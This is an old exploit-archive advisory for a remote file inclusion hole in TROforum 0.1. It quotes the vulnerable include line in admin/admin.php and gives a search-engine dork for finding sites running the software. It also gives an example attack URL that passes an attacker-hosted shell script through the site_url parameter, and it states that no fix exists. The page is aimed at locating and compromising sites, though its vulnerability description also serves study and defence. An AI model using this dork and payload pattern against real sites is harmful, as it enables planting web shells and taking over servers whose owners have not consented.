TROforum 0.1 (admin.php site_url) Remote File Inclusion Vulnerability

2007-05-26 00:00:00

##############################################################################################
# TROforum 0.1 <= Remote File Inclusion Vulnerability #
# #

#Dork:http://www.google.com.tr/search?hl=tr&q=%22TROforum+0.1%22&meta= #
# #

# #
##############################################################################################
#Vuln Code #

# #
#ERROR1:admin/admin.php #
# #

include ("$site_url/trofimov.php"); include ("$site_url/narod.php"); <<<RFI #
# #

# #
# #
#BUG1: #

# #
#Example1:http://victim.com/path/admin/admin.php?site_url=[[Sh3LL Script]] #
##############################################################################################


##############################################################################################

# #
#Script Download #
##############################################################################################

# #
#http://scripts.protoplex.ru/scripts_show/1277.html #
# #

##############################################################################################
# #
#Cyber-Security <> #

# #
##############################################################################################
##############################################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.